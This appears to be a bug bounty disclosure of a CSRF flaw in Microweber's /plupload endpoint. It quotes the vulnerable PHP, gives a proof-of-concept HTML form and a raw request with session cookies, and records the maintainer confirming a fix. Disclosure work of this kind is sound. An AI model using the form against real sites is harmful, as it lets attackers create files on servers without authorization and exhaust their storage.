CSRF attack while uploading files on [/plupload] via GET request in microweber/microweber

Valid

Reported on

Jun 26th 2022


Description

The application is applying a technique to protect itself from CSRF attacks by sending the CSRF token on the cookies and checking the value on the backend and also check the referer header, the CSRF token is deleted from the cookies if the request comes from another origin and just added to the request if the request came from the domain itself and this is a good technique but I found that the endpoint of uploading files /plupload is not using the same protection and the CSRF token sent with the request from another origin so we could attack the application via CSRF attack.

The upload function is creating files and folders and because of using $_REQUEST instaed of $_POST we can send both GET & POST requests, so we can create files on the server with a simple GET request, you can check that on line 54

$fileName_ext = isset($_REQUEST['name']) ? $_REQUEST['name'] : '';

The application on file src\MicroweberPackages\App\functions\plupload.php include the following if conditions, first one is for the Referer header it should be in the request from 14 to 19 lines

$validate_token = false;
if (!isset($_SERVER['HTTP_REFERER'])) {
    header("HTTP/1.1 401 Unauthorized");

    die('{"jsonrpc" : "2.0", "error" : {"code":97, "message": "You are not allowed to upload"}}');
} elseif (!stristr($_SERVER['HTTP_REFERER'], site_url())) {
    //    if (!is_logged()){
//        die('{"jsonrpc" : "2.0", "error" : {"code":98, "message": "You cannot upload from remote domains"}}');
//    }
}

The followin condition is checking the CSRF token in line 26

$validate_token = mw()->user_manager->csrf_validate($_GET);
if ($validate_token == false) {
    header("HTTP/1.1 401 Unauthorized");
    die('{"jsonrpc" : "2.0", "error" : {"code":98, "message": "You are not allowed to upload"}}');
}

Proof of Concept

the following is my exploit payload which

<form action="http://192.168.61.130/test/microweber-master/plupload"> 
<input type="hidden" name="name" value="text.txt">
<input type="hidden" name="chunk" value="">
<input type="hidden" name="chunks" value="">
<input type="hidden" name="file" value="CSRF attack">
<input type="submit">
</form>

The following is the request on a running application

GET /test/microweber-master/plupload?name=text.txt&chunk=&chunks=&file=CSRF+attack HTTP/1.1
Host: 192.168.61.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://57.217.163.25/
Cookie: laravel_session=vmFa4i7A4ZKzlyQgVAhiHlqYlQP457I693WBybqQ; csrf-token-data=%7B%22value%22%3A%22fC1AncN9XvSUl6JF6NHV14Xh7I9dSppPA8fhXPQn%22%2C%22expiry%22%3A1656231713515%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7Ci6aPtAJPWZFxlC4xmqcX4bfnYyFIev9N1AaFHg38cjw0MjDjvLwvZ203MzbZ%7C%242y%2410%24EOb00CAViFXjvcwXYxT8UumlJbI3dq7.VVOapX%2Fq3wYu%2FjCahPBe2; back_to_admin=http%3A//192.168.61.130/test/microweber-master/admin/
Upgrade-Insecure-Requests: 1


and the following is the response

HTTP/1.1 200 OK
Date: Sun, 26 Jun 2022 08:31:07 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 26 Jun 2022 08:31:07 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 117
Connection: close
Content-Type: application/json

{"src":"http:\/\/192.168.61.130\/test\/microweber-master\/userfiles\/media\/default\/text_3.txt","name":"text_3.txt"}

Impact

This lead to use of functions belonging to admin by unauthorized users and can be used to fill all the storage of the server and memory by brute-forcing the upload function.

Occurrences

This line is a proof of using both GET & POST requests on the application

We are processing your report and will contact the microweber team within 24 hours. a month ago
We have contacted a member of the microweber team and are waiting to hear back a month ago
Peter Ivanov modified the Severity from Medium to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a month ago
Mohamed Sayed has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov confirmed that a fix has been merged on e49d79 a month ago
Peter Ivanov has been awarded the fix bounty
plupload.php#L54 has been validated
Peter Ivanov
a month ago

Maintainer


Hello, thanks for the report.

This issue required the user to be logged as admin in order to send the request.

Now its fixed and CSRF verification is also applies to admin user

Mohamed Sayed
a month ago

Researcher


is there a CVE will be assigned to this report?

Peter Ivanov
a month ago

Maintainer


You can assign CVE if you wish

to join this conversation